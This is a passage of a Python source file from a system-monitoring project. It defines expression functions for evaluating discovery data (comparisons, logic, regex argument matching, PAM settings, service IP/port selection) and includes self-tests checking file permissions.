% str(args), file=sys.stderr)\n    val0 = args[0]\n    if val0 is None:\n        return None\n    anymatch = None\n    for val in args[1:]:\n        if val is None:\n            continue\n        if not isinstance(val, type(val0)):\n            if str(val0) != str(val):\n                return False\n        elif val0 != val:\n            return False\n        anymatch = True\n    # print('EQ(%s) => %s' % (str(args), str(anymatch)), file=sys.stderr)\n    return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef NE(args, _context):\n    \"\"\"Function to return True if no non-None argument in the list matches\n    the first one or None if all subsequent arguments are None\"\"\"\n    # print('NE(%s, %s)' % (args[0], str(args[1:])), file=sys.stderr)\n    val0 = args[0]\n    if val0 is None:\n        return None\n    anymatch = None\n    for val in args[1:]:\n        # print('+NE(%s, %s) (%s, %s)' % (val0, val, type(val0), type(val)), file=sys.stderr)\n        if val is None:\n            return None\n        if val0 == val or str(val0) == str(val):\n            return False\n        anymatch = True\n    return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef LT(args, _context):\n    \"\"\"Function to return True if the first argument is less than each of the\n    non-None subsequent arguments, or None if all subsequent arguments are None\"\"\"\n    val0 = args[0]\n    if val0 is None:\n        return None\n    anymatch = None\n    for val in args[1:]:\n        if val is None:\n            continue\n        if val0 >= val:\n            return False\n        anymatch = True\n    return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef GT(args, _context):\n    \"\"\"Function to return True if the first argument is greater than each of the\n    non-None subsequent arguments, or None if all subsequent arguments are None\"\"\"\n    val0 = args[0]\n    if val0 is None:\n        return None\n    anymatch = None\n    for val in args[1:]:\n        if val is None:\n            continue\n        if val0 <= val:\n            return False\n        anymatch = True\n    return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef LE(args, _context):\n    \"\"\"Function to return True if the first argument is less than or equal to each\n    of the non-None subsequent arguments, or None if all subsequent arguments are None\"\"\"\n    val0 = args[0]\n    if val0 is None:\n        return None\n    anymatch = None\n    for val in args[1:]:\n        if val is None:\n            continue\n        if val0 > val:\n            return False\n        anymatch = True\n    return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef GE(args, _context):\n    \"\"\"Function to return True if the first argument is greater than or equal to each\n    of the non-None subsequent arguments, or None if all subsequent arguments are None\"\"\"\n    val0 = args[0]\n    if val0 is None:\n        return None\n    anymatch = None\n    for val in args[1:]:\n        if val is None:\n            continue\n        if val0 < val:\n            return False\n        anymatch = True\n    return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef IN(args, _context):\n    \"\"\"Function to return True if first argument is in the list that follows.\n    If the first argument is iterable, then each element in it must be 'in'\n    the list that follows.\n    \"\"\"\n\n    val0 = args[0]\n    if val0 is None:\n        return None\n    if hasattr(val0, \"__iter__\") and not isinstance(val0, six.string_types):\n        # Iterable\n        anyTrue = False\n        for elem in val0:\n            if elem is None:\n                continue\n            if elem not in args[1:] and str(elem) not in args[1:]:\n                return False\n            anyTrue = True\n        return True if anyTrue else None\n    # Not an iterable: string, int, NoneType, etc.\n    if val0 is None:\n        return None\n    # print(type(val0), val0, type(args[1]), args[1], file=sys.stderr)\n    return val0 in args[1:] or str(val0) in args[1:]\n\n\n@GraphNodeExpression.RegisterFun\ndef NOTIN(args, _context):\n    \"Function to return True if first argument is NOT in the list that follows\"\n    val0 = args[0]\n    if val0 is None:\n        
return None\n if hasattr(val0, \"__iter__\") and not isinstance(val0, six.string_types):\n # Iterable\n for elem in val0:\n if elem in args[1:] or str(elem) in args[1:]:\n return False\n return True\n return val0 not in args[1:] and str(val0) not in args[1:]\n\n\n@GraphNodeExpression.RegisterFun\ndef NOT(args, _context):\n \"Function to Negate the Truth value of its single argument\"\n try:\n val0 = args[0]\n except TypeError:\n val0 = args\n return None if val0 is None else not val0\n\n\ndef _str_to_regexflags(s):\n r\"\"\"Transform a string of single character regex flags to the corresponding integer.\n Note that the flag names are all the Python single character flag names from the 're' module.\n They are as follows:\n A perform 8-bit ASCII-only matching (Python 3 only)\n I Perform non-case-sensitive matching\n L Use locale settings for \\w, =W, \\b and \\B\n M Multi-line match - allow ^ and $ to apply to individual lines in the string\n S Allow the dot character to also match a newline\n U Uses information from the Unicode character properties for \\w, \\W, \\b and \\B.\n (python 2 only)\n X Ignores unescaped whitespace and comments in the pattern string.\n \"\"\"\n\n flags = 0\n if s is not None:\n for char in s:\n if char == \"A\":\n if hasattr(re, \"ASCII\"):\n flags |= getattr(re, \"ASCII\")\n elif char == \"I\":\n flags |= re.IGNORECASE\n elif char == \"L\":\n flags |= re.LOCALE\n elif char == \"M\":\n flags |= re.MULTILINE\n elif char == \"S\":\n flags |= re.DOTALL\n elif char == \"U\":\n flags |= re.UNICODE\n elif char == \"X\":\n flags |= re.VERBOSE\n return flags\n\n\n_regex_cache = {}\n\n\ndef _compile_and_cache_regex(regexstr, flags=None):\n \"Compile and cache a regular expression with the given flags\"\n cache_key = \"%s//%s\" % (str(regexstr), str(flags))\n if cache_key in _regex_cache:\n regex = _regex_cache[cache_key]\n else:\n regex = re.compile(regexstr, _str_to_regexflags(flags))\n _regex_cache[cache_key] = regex\n return regex\n\n\n@GraphNodeExpression.RegisterFun\ndef match(args, _context):\n \"\"\"Function to return True if first argument matches the second argument (a regex)\n - optional 3rd argument is RE flags\"\"\"\n lhs = str(args[0])\n rhs = args[1]\n if lhs is None or rhs is None:\n return None\n flags = args[2] if len(args) > 2 else None\n regex = _compile_and_cache_regex(rhs, flags)\n return regex.search(lhs) is not None\n\n\n@GraphNodeExpression.RegisterFun\ndef argequals(args, context):\n \"\"\"\n usage: argequals name-to-search-for [list-to-search]\n\n A function which searches a list for an argument of the form name=value.\n The value '$argv' is the default name of the list to search.\n If there is a second argument, then that second argument is an expression\n expected to yield an iterable to search in for the name=value string instead of '$argv'\n \"\"\"\n # print('ARGEQUALS(%s)' % (str(args)), file=sys.stderr)\n if len(args) > 2 or len(args) < 1:\n return None\n definename = args[0]\n argname = args[1] if len(args) >= 2 else \"$argv\"\n listtosearch = GraphNodeExpression.evaluate(argname, context)\n # print('SEARCHING in %s FOR %s in %s' % (argname, definename, listtosearch), file=sys.stderr)\n if listtosearch is None:\n return None\n prefix = \"%s=\" % definename\n # W0702: No exception type specified for except statement\n # pylint: disable=W0702\n try:\n for elem in listtosearch:\n if elem.startswith(prefix):\n return elem[len(prefix) :]\n except: # No matter the cause of failure, return None...\n pass\n return 
None\n\n\n@GraphNodeExpression.RegisterFun\ndef argmatch(args, context):\n \"\"\"\n usage: argmatch regular-expression [list-to-search [regex-flags]]\n\n Argmatch searches a list for an value that matches a given regex.\n The regular expression is given by the argument in args, and the list 'argv'\n defaults to be the list of arguments to be searched.\n\n If there are two arguments in args, then the first argument is the\n array value to search in for the regular expression string instead of 'argv'\n\n If the regex contains a parenthesized groups, then the value of the first such group\n is returned, otherwise the part of the argument that matches the regex is returned.\n\n Note that this regular expression is 'anchored' that is, it starts with the first character\n in the argument. If you want it to be floating, then you may want to start your regex\n with '.*' and possibly parenthesize the part you want to return.\n \"\"\"\n # print('ARGMATCH(%s)' % (str(args)), file=sys.stderr)\n # print('ARGMATCHCONTEXT(%s)' % (str(context)), file=sys.stderr)\n if len(args) > 3 or len(args) < 1:\n return None\n regexstr = args[0]\n argname = args[1] if len(args) >= 2 else \"$argv\"\n flags = args[2] if len(args) >= 3 else None\n listtosearch = GraphNodeExpression.evaluate(argname, context)\n if listtosearch is None:\n return None\n\n # W0702: No exception type specified for except statement\n # pylint: disable=W0702\n try:\n # print(regex: /%s/' % regexstr, file=sys.stderr)\n regex = _compile_and_cache_regex(regexstr, flags)\n # print('Matching against list %s' % (str(listtosearch)), file=sys.stderr)\n for elem in listtosearch:\n # print('Matching %s against %s' % (regexstr, elem), file=sys.stderr)\n matchobj = regex.match(elem)\n if matchobj:\n # Did they specify any parenthesized groups?\n if len(matchobj.groups()) > 0:\n # yes - return the (first) parenthesized match\n return matchobj.groups()[0]\n else:\n # no - return everything matched\n return matchobj.group()\n except: # No matter the cause of failure, return None...\n # That includes ill-formed regular expressions...\n pass\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef flagvalue(args, context):\n \"\"\"\n usage: flagvalue flag-name [list-to-search]\n A function which searches a list for a -flag and returns\n the value of the string which is the next argument.\n The -flag is given by the argument in args, and the list 'argv'\n is assumed to be the list of arguments.\n If there are two arguments in args, then the first argument is the\n array value to search in for the -flag string instead of 'argv'\n The flag given must be the entire flag complete with - character.\n For example -X or --someflag.\n \"\"\"\n if len(args) > 2 or len(args) < 1:\n return None\n flagname = args[0]\n argname = args[1] if len(args) >= 2 else \"$argv\"\n\n progargs = GraphNodeExpression.evaluate(argname, context)\n argslen = len(progargs)\n flaglen = len(flagname)\n for pos in range(0, argslen):\n progarg = progargs[pos]\n progarglen = len(progarg)\n if progarg.startswith(flagname):\n if progarg == flagname:\n # -X foobar\n if (pos + 1) < argslen:\n return progargs[pos + 1]\n elif flaglen == 2 and progarglen > flaglen:\n # -Xfoobar -- single character flags only\n return progarg[2:]\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef OR(args, context):\n \"\"\"\n A function which evaluates each expression in turn, and returns the value\n of the first expression which is not None - or None\n \"\"\"\n # print('OR(%s)' % (str(args)), file=sys.stderr)\n if 
len(args) < 1:\n        return None\n    anyfalse = False\n    for arg in args:\n        value = GraphNodeExpression.evaluate(arg, context)\n        if value is not None:\n            if value:\n                return value\n            else:\n                anyfalse = True\n    return False if anyfalse else None\n\n\n@GraphNodeExpression.RegisterFun\ndef AND(args, context):\n    \"\"\"\n    A function which evaluates each expression in turn; it returns False on the\n    first False expression, None if any expression evaluates to None, and True otherwise\n    \"\"\"\n    # print('AND(%s)' % (str(args)), file=sys.stderr)\n    argisnone = True\n    if len(args) < 1:\n        return None\n    for arg in args:\n        value = GraphNodeExpression.evaluate(arg, context)\n        if value is None:\n            argisnone = None\n        elif not value:\n            # print('AND(%s) => False' % (str(args)), file=sys.stderr)\n            return False\n    # print('AND(%s) => %s' % (str(args), argisnone), file=sys.stderr)\n    return argisnone\n\n\n@GraphNodeExpression.RegisterFun\ndef ATTRSEARCH(args, context):\n    \"\"\"\n    Search our first context object for an attribute with the given name and (if supplied) value.\n    If 'value' is None, then we simply search for the given name.\n    We return True if we found what we were looking for, and False otherwise.\n\n    The object to search in is args[0], the name is args[1],\n    and the optional desired value is args[2].\n    \"\"\"\n    return True if FINDATTRVALUE(args, context) else False\n    # return FINDATTRVALUE(args, context) is not None\n    # Note: these are not quite equivalent - they differ when the value found is falsy (e.g. 0 or '').\n\n\n@GraphNodeExpression.RegisterFun\ndef FINDATTRVALUE(args, _context):\n    \"\"\"\n    Search our first context object for an attribute with the given name and (if supplied) value.\n    We return the value found, if it is in the context objects, or None if it is not.\n    If 'value' is None, then we simply search for the given name.\n\n    We return True if the desired value is None, and so is the value we found -\n    otherwise we return the value associated with 'name' or None if not found.\n\n    The object to search in is args[0], the name is args[1],\n    and the optional desired value is args[2].\n    \"\"\"\n    if len(args) not in (2, 3):\n        print(\"WRONG NUMBER OF ARGUMENTS (%d) TO FINDATTRVALUE\" % (len(args)), file=sys.stderr)\n        return None\n    desiredvalue = args[2] if len(args) > 2 else None\n    return _attrfind(args[0], args[1], desiredvalue)\n\n\ndef _is_scalar(obj):\n    'Return True if this object is a pyConfigContext/JSON \"scalar\"'\n    return isinstance(obj, (six.string_types, int, float, bool, pyNetAddr))\n\n\ndef _attrfind(obj, name, desiredvalue):\n    \"\"\"\n    Recursively search the given object for an attribute with the given name\n    and value. 
If 'value' is None, then we simply search for the given name.\n\n We return True if the desired value is None, and the value we found is also None -\n otherwise we return the value associated with 'name' or None if not found.\n \"\"\"\n if _is_scalar(obj):\n return None\n if hasattr(obj, \"__getitem__\"):\n for key in obj:\n keyval = obj[key]\n if key == name:\n if desiredvalue is None:\n return keyval if keyval is not None else True\n elif keyval == desiredvalue or str(keyval) == str(desiredvalue):\n # We use str() to allow pyNetAddr objects to compare equal\n # and the possibility of type mismatches (strings versus integers, for example)\n # This may also improve the chance of floating point compares working as\n # intended.\n return keyval\n elif hasattr(obj, \"__iter__\"):\n for elem in obj:\n ret = _attrfind(elem, name, desiredvalue)\n if ret is not None:\n return ret\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef PAMMODARGS(args, _context):\n \"\"\"\n We pass the following arguments to PAMSELECTARGS:\n section - the section value to select from\n service - service type to search for\n module - the module to select arguments from\n argument - the arguments to select\n\n We return the arguments from the first occurence of the module that we find.\n \"\"\"\n # print('PAMMODARGS(%s)' % (str(args)), file=sys.stderr)\n if len(args) != 4:\n print(\"WRONG NUMBER OF ARGUMENTS (%d) TO PAMMODARGS\" % (len(args)), file=sys.stderr)\n return False\n section = args[0]\n reqservice = args[1]\n reqmodule = args[2]\n reqarg = args[3]\n\n if section is None:\n # print('Section is None in PAM object', file=sys.stderr)\n return None\n # Each section is a list of lines\n for line in section:\n # Each line is a dict with potential keys of:\n # - service: a keyword saying what kind of service\n # - filename:(only for includes)\n # - type: dict of keywords (requisite, required, optional, etc)\n # - module: Module dict keywords with:\n # - path - pathname of module ending in .so\n # - other arguments as per the module's requirements\n # simple flags without '=' values show up with True as value\n #\n if \"service\" not in line or line[\"service\"] != reqservice:\n # print('Service %s not in PAM line %s' % (reqservice, str(line)), file=sys.stderr)\n continue\n if \"module\" not in line:\n # print('\"module\" not in PAM line %s' % str(line), file=sys.stderr)\n continue\n if \"path\" not in line[\"module\"]:\n # print('\"path\" not in PAM module %s' % str(line['module']), file=sys.stderr)\n # print('\"path\" not in PAM line %s' % str(line), file=sys.stderr)\n continue\n modargs = line[\"module\"]\n if reqmodule != \"ANY\" and (\n modargs[\"path\"] != reqmodule and modargs[\"path\"] != (reqmodule + \".so\")\n ):\n # print('Module %s not in PAM line %s' % (reqmodule, str(line)), file=sys.stderr)\n continue\n ret = modargs[reqarg] if reqarg in modargs else None\n if ret is None and reqmodule == \"ANY\":\n continue\n # print('RETURNING %s from %s' % (ret, str(line)), file=sys.stderr)\n return ret\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef MUST(args, _unused_context):\n \"Return True if all args are True. 
A None arg is the same as False to us\"\n # print('CALLING MUST%s' % str(tuple(args)), file=sys.stderr)\n if not hasattr(args, \"__iter__\") or isinstance(args, six.string_types):\n args = (args,)\n for arg in args:\n if arg is None or not arg:\n # print('+++MUST returns FALSE', file=sys.stderr)\n return False\n # print('+++MUST returns TRUE', file=sys.stderr)\n return True\n\n\n@GraphNodeExpression.RegisterFun\ndef NONEOK(args, _unused_context):\n \"Return True if all args are True or None - that is, if no args are False\"\n # print('CALLING MUST%s' % str(tuple(args)), file=sys.stderr)\n if not hasattr(args, \"__iter__\") or isinstance(args, six.string_types):\n args = (args,)\n for arg in args:\n if arg is not None and not arg:\n # print('+++NONEOK returns FALSE', file=sys.stderr)\n return False\n # print('+++NONEOK returns TRUE', file=sys.stderr)\n return True\n\n\n@GraphNodeExpression.RegisterFun\ndef FOREACH(args, context):\n \"\"\"Applies the (string) expression (across all values in the context,\n returning the 'AND' of the evaluation of the expression-evaluations\n across the top level values in the context. It stops evaluation on\n the first False return.\n\n The final argument is the expression (predicate) to be evaluated. Any\n previous arguments in 'args' are expressions to be evaluated in the context\n 'context' then used as the 'context' for this the expression in this FOREACH.\n Note that this desired predicate is a _string_, which is then evaluated\n (like 'eval'). It is not a normal expression, but a string containing\n an expression. You _will_ have to quote it.\n\n When given a single argument, it will evaluate the string expression\n for each of top-level values in the object. Normally this would be the 'data'\n portion of a discovery object. 
So, for example, if each of the top level keys\n    is a file name and the values are file properties, then it will evaluate the\n    expression on the properties of every file in the object.\n\n    If you need to evaluate this across all the elements of a sub-object named\n    \"filenames\" in the top level \"data\" object then you give \"$filenames\" as the\n    context argument, and your predicate as the expression like this:\n    [\"$filenames\", \"\"].\n\n    The code to do this is simpler than the explanation ;-)\n    \"\"\"\n    anynone = False\n    if len(args) == 1:\n        objectlist = context.objects\n    else:\n        objectlist = [GraphNodeExpression.evaluate(obj, context) for obj in args[:-1]]\n\n    expressionstring = args[-1]\n    if not isinstance(expressionstring, six.string_types):\n        print(\n            \"FOREACH expression must be a string, not %s\" % type(expressionstring), file=sys.stderr\n        )\n        return False\n    # print('OBJECTLIST is:', objectlist, file=sys.stderr)\n    for obj in objectlist:\n        # print('OBJ is:', obj, file=sys.stderr)\n        for key in obj:\n            item = obj[key]\n            if not hasattr(item, \"__contains__\") or not hasattr(item, \"__iter__\"):\n                print(\"UNSUITABLE FOREACH CONTEXT[%s]: %s\" % (key, item), file=sys.stderr)\n                continue\n            # print(sys.stderr, 'CREATING CONTEXT[%s]: %s' % (key, item), file=sys.stderr)\n            itemcontext = ExpressionContext(item)\n            # print('CONTEXT IS:', itemcontext, file=sys.stderr)\n            value = GraphNodeExpression.evaluate(expressionstring, itemcontext)\n            # print('VALUE of %s IS [%s] in context: %s' % (str(args), value, item), file=sys.stderr)\n            if value is None:\n                anynone = True\n            elif not value:\n                return False\n    return None if anynone else True\n\n\n@GraphNodeExpression.RegisterFun\ndef bitwiseOR(args, context):\n    \"\"\"\n    A function which evaluates each expression and returns the bitwise OR of\n    all the expressions given as arguments\n    \"\"\"\n    if len(args) < 2:\n        return None\n    result = 0\n    for arg in args:\n        value = GraphNodeExpression.evaluate(arg, context)\n        if value is None:\n            return None\n        result |= int(value)\n    return result\n\n\n@GraphNodeExpression.RegisterFun\ndef bitwiseAND(args, context):\n    \"\"\"\n    A function which evaluates each expression and returns the bitwise AND of\n    all the expressions given as arguments\n    \"\"\"\n    if len(args) < 2:\n        return None\n    result = int(args[0])\n    for arg in args:\n        value = GraphNodeExpression.evaluate(arg, context)\n        if value is None:\n            return None\n        result &= int(value)\n    return result\n\n\n@GraphNodeExpression.RegisterFun\ndef is_upstartjob(args, context):\n    \"\"\"\n    Returns \"true\" if any of its arguments names an upstart job, \"false\" otherwise\n    If no arguments are given, it returns whether this system has upstart enabled.\n    \"\"\"\n\n    from monitoring import MonitoringRule\n\n    agentcache = MonitoringRule.compute_available_agents(context)\n\n    if \"upstart\" not in agentcache or len(agentcache[\"upstart\"]) == 0:\n        return \"false\"\n\n    for arg in args:\n        value = GraphNodeExpression.evaluate(arg, context)\n        if value in agentcache[\"upstart\"]:\n            return \"true\"\n    return \"true\" if len(args) == 0 else \"false\"\n\n\ndef _regexmatch(key):\n    \"\"\"Handy internal function to pull out the IP and port into a pyNetAddr\n    Note that the format is the format used in the discovery information\n    which in turn is the format used by netstat.\n    This is not a \"standard\" format, but it's what netstat uses - so it's\n    what we use.\n    \"\"\"\n    mobj = ipportregex.match(key)\n    if mobj is None:\n        return None\n    (ip, port) = mobj.groups()\n    ipport = pyNetAddr(ip, port=int(port))\n    if 
ipport.isanyaddr():\n        if ipport.addrtype() == ADDR_FAMILY_IPV4:\n            ipport = pyNetAddr(\"127.0.0.1\", port=ipport.port())\n        else:\n            ipport = pyNetAddr(\"::1\", port=ipport.port())\n    return ipport\n\n\ndef _collect_ip_ports(service):\n    \"Collect our complete set of IP/Port combinations for this service\"\n    portlist = {}\n    for key in service.keys():\n        ipport = _regexmatch(key)\n        if ipport is None:\n            continue\n        if ipport.port() == 0:\n            continue\n        port = ipport.port()\n        if port in portlist:\n            portlist[port].append(ipport)\n        else:\n            portlist[port] = [ipport]\n    return portlist\n\n\n# Netstat format IP:port pattern\nipportregex = re.compile(\"(.*):([^:]*)$\")\n\n\ndef selectanipport(arg, _context, preferlowestport=True, preferv4=True):\n    \"\"\"This function searches discovery information for a suitable IP\n    address/port combination to go with the service.\n    \"\"\"\n\n    # print('SELECTANIPPORT(%s)' % arg, file=sys.stderr)\n    try:\n\n        portlist = _collect_ip_ports(arg)\n        portkeys = list(portlist.keys())\n        if preferlowestport:\n            portkeys.sort()\n        for p in portlist[portkeys[0]]:\n            if preferv4:\n                if p.addrtype() == ADDR_FAMILY_IPV4:\n                    return p\n            else:\n                if p.addrtype() == ADDR_FAMILY_IPV6:\n                    return p\n        return portlist[portkeys[0]][0]\n    except (KeyError, ValueError, TypeError, IndexError):\n        # Something is hinky with this data\n        return None\n\n\n@GraphNodeExpression.RegisterFun\ndef serviceip(args, context):\n    \"\"\"\n    This function searches discovery information for a suitable concrete IP\n    address for a service.\n    The argument to this function tells it an expression that will give\n    it the hash table (map) of IP/port combinations for this service.\n    \"\"\"\n    if len(args) == 0:\n        args = (\"$procinfo.listenaddrs\",)\n    # print('SERVICEIP(%s)' % str(args), file=sys.stderr)\n    for arg in args:\n        nmap = GraphNodeExpression.evaluate(arg, context)\n        if nmap is None:\n            continue\n        # print('serviceip.SELECTANIPPORT(%s)' % (nmap), file=sys.stderr)\n        ipport = selectanipport(nmap, context)\n        if ipport is None:\n            continue\n        ipport.setport(0)  # Make sure return value doesn't include the port\n        # print('IPPORT(%s)' % str(ipport), file=sys.stderr)\n        return str(ipport)\n    return None\n\n\n@GraphNodeExpression.RegisterFun\ndef serviceport(args, context):\n    \"\"\"\n    This function searches discovery information for a suitable port for a service.\n    The argument to this function tells it an expression that will give\n    it the hash table (map) of IP/port combinations for this service.\n    \"\"\"\n    if len(args) == 0:\n        args = (\"$procinfo.listenaddrs\",)\n    # print('SERVICEPORT ARGS are %s' % (str(args)), file=sys.stderr)\n    for arg in args:\n        nmap = GraphNodeExpression.evaluate(arg, context)\n        if nmap is None:\n            continue\n        ipport = selectanipport(nmap, context)\n        if ipport is None:\n            continue\n        return str(ipport.port())\n    return None\n\n\n@GraphNodeExpression.RegisterFun\ndef serviceipport(args, context):\n    \"\"\"\n    This function searches discovery information for a suitable ip:port combination.\n    The argument to this function tells it an expression that will give\n    it the hash table (map) of IP/port combinations for this service.\n    The return value is a legal ip:port combination for the given\n    address type (ipv4 or ipv6)\n    \"\"\"\n    if len(args) == 0:\n        args = (\"$procinfo.listenaddrs\",)\n    for arg in args:\n        nmap = GraphNodeExpression.evaluate(arg, context)\n        if nmap is None:\n            continue\n        ipport = selectanipport(nmap, context)\n        if ipport is None:\n            continue\n        return str(ipport)\n    return None\n\n\n@GraphNodeExpression.RegisterFun\ndef basename(args, context):\n    \"\"\"\n    
This function returns the basename from a pathname.\n If no pathname is supplied, then the executable name is assumed.\n \"\"\"\n if isinstance(args, six.string_types):\n args = (args,)\n if len(args) == 0:\n args = (\"$pathname\",) # Default to the name of the executable\n for arg in args:\n pathname = GraphNodeExpression.evaluate(arg, context)\n if pathname is None:\n continue\n # print('BASENAME(%s) => %s' % ( pathname, file=sys.stderr)\n # , os.path.basename(pathname))\n return os.path.basename(pathname)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef dirname(args, context):\n \"\"\"\n This function returns the directory name from a pathname.\n If no pathname is supplied, then the discovered service executable name is assumed.\n \"\"\"\n if isinstance(args, six.string_types):\n args = (args,)\n if len(args) == 0:\n args = (\"$pathname\",) # Default to the name of the executable\n for arg in args:\n pathname = GraphNodeExpression.evaluate(arg, context)\n if pathname is None:\n continue\n return os.path.dirname(pathname)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef hascmd(args, context):\n \"\"\"\n This function returns True if the given list of commands are all present on the given Drone.\n It determines this by looking at the value of $_init_commands.data\n \"\"\"\n cmdlist = GraphNodeExpression.evaluate(\"$_init_commands.data\", context)\n for arg in args:\n if cmdlist is None or arg not in cmdlist:\n return None\n return True\n\n\nif __name__ == \"__main__\":\n\n def simpletests():\n \"\"\"These tests don't require a real context\"\"\"\n assert NOT((True,), None) is False\n assert NOT((False,), None) is True\n assert EQ((1, 1, \"1\"), None) is True\n assert NOT(EQ((1,), None), None) is None\n assert MUST(NOT(EQ((1,), None), None), None) is False\n assert NONEOK(NOT(EQ((1,), None), None), None) is True\n assert NOT(EQ((1, 1, \"2\"), None), None) is True\n assert NOT(EQ((0, 0, \"2\"), None), None) is True\n assert EQ((\"a\", \"a\", \"a\"), None) is True\n assert EQ((\"0\", \"0\", 0), None) is True\n assert NOT(NE((1, 1, \"1\"), None), None) is True\n assert NOT(NE((1,), None), None) is None\n assert NONEOK(NOT(NE((1,), None), None), None) is True\n assert MUST(NOT(NE((1,), None), None), None) is False\n assert NOT(NE((1, 1, \"2\"), None), None) is True\n assert NOT(NE((0, 0, \"2\"), None), None) is True\n assert NOT(NE((\"a\", \"a\", \"a\"), None), None) is True\n assert NOT(NE((\"0\", \"0\", 0), None), None) is True\n assert LE((1, 1), None) is True\n assert LE((1, 5), None) is True\n assert NOT(LT((1, 1), None), None) is True\n assert LT((1, 5), None) is True\n assert NOT(GT((1, 1), None), None) is True\n assert GE((1, 1), None) is True\n assert IN((1, 2, 3, 4, 1), None) is True\n assert IN((1, 2, 3, 4, \"1\"), None) is True\n assert NOT(IN((1, 2, 3, 4), None), None) is True\n assert NOT(NOTIN((1, 2, 3, 4, 1), None), None) is True\n assert NOT(NOTIN((1, 2, 3, 4, \"1\"), None), None) is True\n assert NOTIN((1, 2, 3, 4), None) is True\n assert bitwiseOR((1, 2, 4), None) == 7\n assert bitwiseOR((1, 2, \"4\"), None) == 7\n assert bitwiseAND((7, 3), None) == 3\n assert bitwiseAND((7, 1, \"2\"), None) == 0\n assert bitwiseAND((\"15\", \"7\", \"3\"), None) == 3\n assert IGNORE((False, False, False), None)\n assert MUST(None, None) is False\n assert MUST(True, None) is True\n assert MUST(False, None) is False\n assert NONEOK(None, None) is True\n assert NONEOK(True, None) is True\n assert NONEOK(False, None) is False\n assert match((\"fred\", \"fre\"), None)\n assert 
match((\"fred\", \"FRE\"), None) is False\n assert match((\"fred\", \"FRE\", \"I\"), None) is True\n assert basename((\"/dev/null\"), None) == \"null\"\n assert dirname((\"/dev/null\"), None) == \"/dev\"\n print(\"Simple tests passed.\", file=sys.stderr)\n\n def contexttests():\n \"GraphNodeExpression tests that need a context\"\n\n lsattrs = \"\"\"{\n \"/var/log/audit/\": {\"owner\": \"root\", \"group\": \"root\", \"type\": \"d\", \"perms\": {\"owner\":{\"read\":true, \"write\":true, \"exec\":true, \"setid\":false}, \"group\": {\"read\":true, \"write\":false, \"exec\":true, \"setid\":false}, \"other\": {\"read\":false, \"write\":false, \"exec\":false}, \"sticky\":false}, \"octal\": \"0750\"},\n \"/var/log/audit/audit.log\": {\"owner\": \"root\", \"group\": \"root\", \"type\": \"-\", \"perms\": {\"owner\":{\"read\":true, \"write\":true, \"exec\":false, \"setid\":false}, \"group\": {\"read\":false, \"write\":false, \"exec\":false, \"setid\":false}, \"other\": {\"read\":false, \"write\":false, \"exec\":false}, \"sticky\":false}, \"octal\": \"0600\"},\n \"/var/log/audit/audit.log.1\": {\"owner\": \"root\", \"group\": \"root\", \"type\": \"-\", \"perms\": {\"owner\":{\"read\":true, \"write\":false, \"exec\":false, \"setid\":false}, \"group\": {\"read\":false, \"write\":false, \"exec\":false, \"setid\":false}, \"other\": {\"read\":false, \"write\":false, \"exec\":false}, \"sticky\":false}, \"octal\": \"0400\"}\n}\"\"\"\n lscontext = ExpressionContext(pyConfigContext(lsattrs))\n\n Pie_context = ExpressionContext(\n (\n pyConfigContext(\n {\n \"a\": {\"b\": \"c\", \"pie\": 3, \"pi\": 3, \"const\": \"constant\"},\n \"f\": {\"g\": \"h\", \"pie\": \"3\", \"pi\": 3, \"const\": \"constant\"},\n }\n ),\n pyConfigContext({\"math\": {\"pi\": 3.14159, \"pie\": 3, \"const\": \"constant\"}}),\n pyConfigContext({\"geography\": {\"Europe\": \"big\", \"const\": \"constant\"}}),\n )\n )\n complicated_context = ExpressionContext(pyConfigContext({\"a\": {\"b\": {\"pie\": 3}}}))\n argcontext = ExpressionContext(\n pyConfigContext('{\"argv\": [\"command-name-suffix\", \"thing-one\", \"thang-two\"]}')\n )\n\n assert FOREACH((\"EQ(False, $perms.group.write, $perms.other.write)\",), lscontext) is True\n assert FOREACH((\"EQ($pi, 3)\",), Pie_context) is False\n assert FOREACH((\"EQ($pie, 3)\",), Pie_context) is None\n assert FOREACH((\"$a\", \"EQ($pie, 3)\"), complicated_context) is True\n assert FOREACH((\"$a\", \"EQ($pie, 3.14159)\"), complicated_context) is False\n assert FOREACH((\"$a\", \"EQ($pi, 3.14159)\"), complicated_context) is None\n assert FOREACH((\"EQ($const, constant)\",), Pie_context) is True\n assert GraphNodeExpression.evaluate(\"EQ($math.pie, 3)\", Pie_context) is True\n assert FOREACH((\"EQ($group, root)\",), lscontext) is True\n assert FOREACH((\"EQ($owner, root)\",), lscontext) is True\n assert FOREACH((\"AND(EQ($owner, root), EQ($group, root))\",), lscontext) is True\n assert argmatch((\"thing-(.*)\",), argcontext) == \"one\"\n assert argmatch((\"THING-(.*)\", \"$argv\", \"I\"), argcontext) == \"one\"\n assert argmatch((\"thang-(.*)\",), argcontext) == \"two\"\n assert argmatch((\"THANG-(.*)\", \"$argv\", \"I\"), argcontext) == \"two\"\n assert argmatch((\"thang-.*\",), argcontext) == \"thang-two\"\n assert argmatch((\"THANG-.*\", \"$argv\", \"I\"), argcontext) == \"thang-two\"\n print(\"Context tests passed.\", file=sys.stderr)\n\n simpletests()\n contexttests()\n print(\"All tests passed.\", 
file=sys.stderr)\n","repo_name":"assimilation/assimilation-official","sub_path":"cma/graphnodeexpression.py","file_name":"graphnodeexpression.py","file_ext":"py","file_size_in_byte":48328,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"18"}
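A minimal usage sketch of the expression machinery above, assuming it runs in this module's namespace with pyConfigContext available (as contexttests() already assumes); STRLEN is a hypothetical function registered purely for illustration:

    @GraphNodeExpression.RegisterFun
    def STRLEN(args, _context):
        "Hypothetical example function: length of the first argument, or None."
        return len(str(args[0])) if args and args[0] is not None else None

    ctx = ExpressionContext(pyConfigContext('{"name": "audit.log"}'))
    assert GraphNodeExpression.evaluate('STRLEN($name)', ctx) == 9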
